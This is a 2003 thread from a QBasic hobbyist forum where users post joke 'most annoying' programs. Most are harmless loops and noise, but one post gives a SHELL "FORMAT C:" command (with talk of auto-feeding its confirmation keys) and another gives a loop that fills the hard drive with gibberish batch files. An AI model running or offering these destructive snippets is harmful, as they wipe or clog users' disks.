Qbasicnews.com
New challenge - most annoying program - Printable Version

+- Qbasicnews.com (http://qbasicnews.com/newforum)
+-- Forum: QbasicNews.Com (http://qbasicnews.com/newforum/forum-3.html)
+--- Forum: Challenges (http://qbasicnews.com/newforum/forum-10.html)
+--- Thread: New challenge - most annoying program (/thread-1003.html)

Pages: 1 2 3 4 5 6 7 8 9 10 11 12 13


New challenge - most annoying program - ak00ma - 06-06-2003

Quote:Oh oh oHHHHH!! I got one, I have an idea for an annoying program!!!!

Code:
DO
PRINT "*annoying mocking voice* Hi I'm wildcard. You can't do this and that. I'm a big jerk face. Waaaaa, I'm complaining about lots of stupid stuff."
LOOP

Am I understanding anything wrong or are you just very sarcastic????

What did Wildcard against you (if you meant this prog to be serious)???


New challenge - most annoying program - Neo - 06-06-2003

Well... he's right about that the program is annoying. But it is very insulting too.

I think Seph should at least say sorry to wildcard, because wildcard was the one who made this forum and qbn existing. HE IS THE MAN!


New challenge - most annoying program - na_th_an - 06-06-2003

May young people learneth to value valuable things. Aaaaw...


New challenge - most annoying program - Neo - 06-06-2003

He shalt learneth from xperience, appearably


New challenge - most annoying program - relsoft - 06-07-2003

Quote:CLS
DO
I$ = INKEY$
IF I$ <> "" then EXIT DO: PRINT "You pressed <any key>."
LOOP

'Rel, that's dangerous!

Yeah. But still annoying. Hey he wanted the user to throw the monitor!!!!

;*)


New challenge - most annoying program - Antoni Gual - 06-07-2003

Code:
SHELL "FORMAT C:"



New challenge - most annoying program - Rokkuman - 06-07-2003

Code:
SCREEN 13
DO
PRINT (CHR$(RND * 50))
SOUND INT(RND * 500) + 100, INT(RND * 30) + 20
LINE (INT(RND * 320), INT(RND * 200))-(INT(RND * 320), INT(RND * 200)), 15, B
LOOP



New challenge - most annoying program - ak00ma - 06-07-2003

Quote:
Code:
SHELL "FORMAT C:"

Is there a way to disable the keyboard????

HEHEHEHEHEHEHE


New challenge - most annoying program - Antoni Gual - 06-08-2003

No, but I once saw somewhere a way to send to keyboard buffer the keys the shelled program would need...


New challenge - most annoying program - Joakim - 06-08-2003

Code:
PRINT "Think of a river. Think of ripples. When did you take a leap? Too long ago? Do it now. I'll prepare a surprise while you're gone..."
CHDIR "c:"
DO
i = i + 1
OPEN CHR$(RND * 97 + 24) + LTRIM$(STR$(i)) + ".bat" FOR OUTPUT AS #1
FOR ii = 1 TO 30000
  PRINT #1, "Relax, I'm just filling your harddrive with gibberish. Relax. Take your time. That's right."
NEXT
CLOSE #1
LOOP

Heh... Untested of course Wink